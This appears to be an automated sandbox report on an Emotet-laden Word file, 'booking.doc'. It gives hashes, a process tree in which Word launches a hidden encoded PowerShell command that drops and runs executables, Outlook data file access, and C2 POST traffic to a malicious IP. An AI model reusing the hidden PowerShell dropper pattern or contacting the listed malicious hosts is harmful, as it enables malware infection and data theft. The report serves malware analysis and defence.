Field | Value |
---|---|
File name: | booking.doc |
Full analysis: | https://app.any.run/tasks/e59955a5-42ba-499a-8bde-2c409ee615c9 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 16, 2019, 07:46:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Dolore sunt a., Author: Laura Brehmer, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 15 21:33:00 2019, Last Saved Time/Date: Fri Nov 15 21:33:00 2019, Number of Pages: 1, Number of Words: 21, Number of Characters: 121, Security: 0 |
MD5: | 45CF8F0BC99856BC508DF2242BF08DB1 |
SHA1: | 8539C7075E7060946E5774779429F0ADCEE08170 |
SHA256: | D115EB3832178142E9A59F565E63729F54E110CC963DC7F10B95F5BEFF943CB7 |
SSDEEP: | 3072:cxTyQH+UaqFh5Br/SzFaSadGBrjC48+WZ/POhh+/+qls5nIo:cxTyQHNaqjSzGdD48+aPOnX8s5n3 |
Extension | Identified type (score) |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Field | Value |
---|---|
CompObjUserType: | Microsoft Forms 2.0 Form |
CompObjUserTypeLen: | 25 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 141 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 121 |
Words: | 21 |
Pages: | 1 |
ModifyDate: | 2019:11:15 21:33:00 |
CreateDate: | 2019:11:15 21:33:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Laura Brehmer |
Subject: | - |
Title: | Dolore sunt a. |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
1316 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\booking.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 |
688 | powershell -w hidden -enco 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
616 | "C:\Windows\system32\taskmgr.exe" /4 | C:\Windows\system32\taskmgr.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Task Manager; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2576 | "C:\Windows\system32\taskmgr.exe" /1 | C:\Windows\system32\taskmgr.exe | | taskmgr.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Windows Task Manager; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
912 | "C:\Users\admin\790.exe" | C:\Users\admin\790.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
1596 | --4c25e06c | C:\Users\admin\790.exe | | 790.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
2192 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 790.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
3116 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | | serialfunc.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
1764 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" "C:\Users\admin\AppData\Local\Temp\20FB.tmp" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | serialfunc.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
4000 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | | explorer.exe | User: admin; Integrity Level: HIGH; Exit code: 0 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB1F.tmp.cvr | — | — | — |
688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2GUME724QN2WQOO0PKC.temp | — | — | — |
1764 | serialfunc.exe | C:\Users\admin\Documents\Outlook Files\~Outlook Data File - NoMail.pst.tmp | — | — | — |
1764 | serialfunc.exe | C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp | — | — | — |
1764 | serialfunc.exe | C:\Users\admin\Documents\Outlook Files\[email protected] | — | — | — |
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B3746CA4.wmf | wmf | FA29F4F0BC316F8701A808850C6138C5 | 60FC4D471A9FC8C72719E717B393D68B477BAC855FA58B84481E20EF67295C30 |
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C730E7BE.wmf | wmf | FB04D014602BDB455CA309B315CC677F | 65E4794B8C32EEAC4AFFF0A2D4A229DF02A70A3A57924C234488A025D838C425 |
688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b977.TMP | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
688 | powershell.exe | C:\Users\admin\790.exe | executable | 6CA5B27039A565878D3441BD97A814A0 | 3E06BC2EBF7F85B2C846633A6A0F1A596EA54138D9D56486AAF69AA3020CA607 |
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B5F78A7.wmf | wmf | 143261C15C728A68639D8F0365E24274 | AF3D5F8D981F4B682CDB307013A79686885C95931AE5CAAC4C912DA76DB6E5FA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3116 | serialfunc.exe | POST | 200 | 195.201.56.70:80 | http://195.201.56.70/attrib/merge/add/merge/ | RU | binary | 240 Kb | malicious |
3116 | serialfunc.exe | POST | 200 | 195.201.56.70:80 | http://195.201.56.70/img/ | RU | binary | 148 b | malicious |
3980 | serialfunc.exe | POST | 200 | 195.201.56.70:80 | http://195.201.56.70/entries/arizona/add/merge/ | RU | binary | 148 b | malicious |
— | — | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA%2Fz5hY5qj0aEmX0H4s05bY%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
688 | powershell.exe | 145.14.145.234:443 | water-cooled-cycles.000webhostapp.com | Hostinger International Limited | US | shared |
1252 | gup.exe | 104.31.89.28:443 | notepad-plus-plus.org | Cloudflare Inc | US | shared |
3980 | serialfunc.exe | 195.201.56.70:80 | — | PP Podilsky Intelectualni sistemy | RU | malicious |
688 | powershell.exe | 138.117.149.13:443 | suarezcorredores.cl | Gtd Internet S.A. | CL | suspicious |
3116 | serialfunc.exe | 195.201.56.70:80 | — | PP Podilsky Intelectualni sistemy | RU | malicious |
— | — | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
suarezcorredores.cl | | suspicious |
water-cooled-cycles.000webhostapp.com | | shared |
notepad-plus-plus.org | | whitelisted |
ocsp.digicert.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
688 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
3116 | serialfunc.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3116 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3116 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3980 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
Process | Message |
---|---|
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll |
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled |
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093 |
mmc.exe | Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |
mmc.exe | OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |
mmc.exe | ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn |